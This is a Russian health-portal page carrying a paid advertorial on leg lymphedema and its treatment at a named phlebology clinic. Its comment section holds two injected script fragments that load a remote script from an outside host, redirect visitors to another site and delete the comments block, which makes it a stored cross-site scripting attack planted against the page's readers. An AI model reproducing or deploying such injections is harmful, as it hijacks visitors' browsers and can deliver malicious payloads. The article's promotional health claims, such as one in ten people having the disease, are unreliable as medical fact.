Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Лимфедема – если отекают ...  >>  Лимфедема – если отекают ноги
 
Обратная связь
 

Лимфедема – если отекают ноги

Размер шрифта
10 апреля 2013 00:00
  • google_analytics: false
  • Нравится

О варикозе слышали практически все. Расширенные вены требуют лечения под наблюдением специалиста. Но часто проблемы с ногами связаны не только с кровеносными, но и с лимфатическими сосудами.  Простой отек может оказаться симптомом серьезной болезни – лимфедемы.

Эта болезнь встречается гораздо чаще, чем может показаться. Ею страдает каждый десятый житель планеты. Просто люди не всегда понимают сложность ситуации и пытаются лечить ее «дедовскими» способами, не обращаясь к врачу. Это огромная ошибка, которая может привести к тяжелым последствиям.

Как отличить лимфедему от обычного отека

Так что же скрывается за этим пугающим словом «лимфедема»? Это заболевание возникает в результате нарушения тока лимфы в тканях. Проблемы с лимфатической системой особенно часто возникают у женщин. Выражается это в виде значительного увеличения объема ног. На начальной стадии заболевания ноги отекают в конце дня, а к утру проходят. Это уже серьезный повод обратиться к врачу.

«Да, немного беспокоит, но главное, что с утра все нормально», – если бы не это распространенное мнение, то второй стадии многим удалось бы избежать. Вторая стадия, это когда отеки становятся более устойчивыми и уже не проходят. А если лимфедему запустить, то это может привести к трофическим нарушениям (язвы, дерматит, экземы).

Из-за чего возникает лимфедема

Лимфедема бывает врожденная и приобретенная. В первом случае она может проявляться уже в раннем детстве или в период полового созревания, когда меняется гормональный фон. Но врожденные патологии встречаются гораздо реже, чем приобретенная болезнь. Лимфодема часто возникает как осложнение перенесенных кожных заболеваний, результат онкологии, гинекологических проблем или воспалений органов малого таза у женщин.

Как ее лечить

Долгое время больным лимфедемой в России практически некуда было обратиться за лечением. Не было ни специалистов в этой области, ни соответствующего оборудования. К счастью, за последние 10 лет ситуация изменилась. В российских городах появились клиники, специализирующиеся на лимфологии и использующие опыт лучших мировых клиник.

«Лечение лимфедемы начинается с мануального лимфодренажного массажа», – говорит Евгений Сильчук, зав. отделением лимфологии и ХВН  клиники «Центр Флебологии», – «это очень легкий, щадящий массаж, который начинается с непораженных участков. Вторым этапом процедуры идет аппаратная пневмокомпрессия. На пациента надеваются так называемые пневмоштаны, в разные камеры, в которые по определенной компьютерной программе подается воздух, что способствует эффективному лимфодренажу. А третий этап – наложение специального компрессионного трикотажа. Это не дает отеку снова нарастать, удерживая ногу в тех размерах, которых мы добиваемся с помощью первых двух процедур».

Сколько длится курс

Курс состоит, как правило, из 8-10 процедур. В конце лечения замеряют ноги и подбирают компрессионный трикотаж, который необходимо носить для поддержания результата. Он особым образом стягивает ноги и помогает току лимфы в тканях.

В лечении очень важно активное участие и мотивация самого пациента. Он должен заниматься лечебной физкультурой, делать специальные упражнения, причем в бандаже или компрессионном трикотаже. Для эффективной борьбы с заболеванием придется изменить и свой образ жизни, отказаться от вредных привычек, следить за питанием, повысить двигательную активность.

«Я заболела рожистым заболеванием и попала в больницу, – говорит Лариса Довыденкова, пациент клиники «Центр Флебологии», – Медсестра, которая за мной ухаживала, сказала, что мне нужно обратиться к врачу-флебологу. Уже по рекомендации я обратилась в «Центр Флебологии». Лечение было настолько эффективным, что теперь, гуляя с собакой, я могу проходить по четыре километра. Вы даже не представляете, какое это счастье после долгих лет снова ходить как все».

Можно ли полностью вылечить лимфедему

К сожалению, панацеи от лимфедемы нет. И не верьте никому, кто вам ее обещает. Полностью излечиться от лимфодемы невозможно, но можно значительно уменьшить или полностью убрать лимфатический отек и поддерживать  достигнутый результат.

Подробно прочитать информацию на тему заболевания вен можно на сайте http://doktornog.ru/

ИМЕЮТСЯ ПРОТИВОПОКАЗАНИЯ. НЕОБХОДИМА КОНСУЛЬТАЦИЯ СПЕЦИАЛИСТА

 

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Лечение варикоза. Что важно знать при выборе клиники?   5 заблуждений о варикозе   Как избавиться от варикозных вен? Кратко о самом главном   Чем мужчины лучше женщин?  

Слайдшоу

1
Самые стыдные вопросы о красоте. Часть 2
Как сохранить красоту ног?
Как избавиться от варикоза. Лазер

Тесты

Есть ли у вас варикозное расширение вен?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.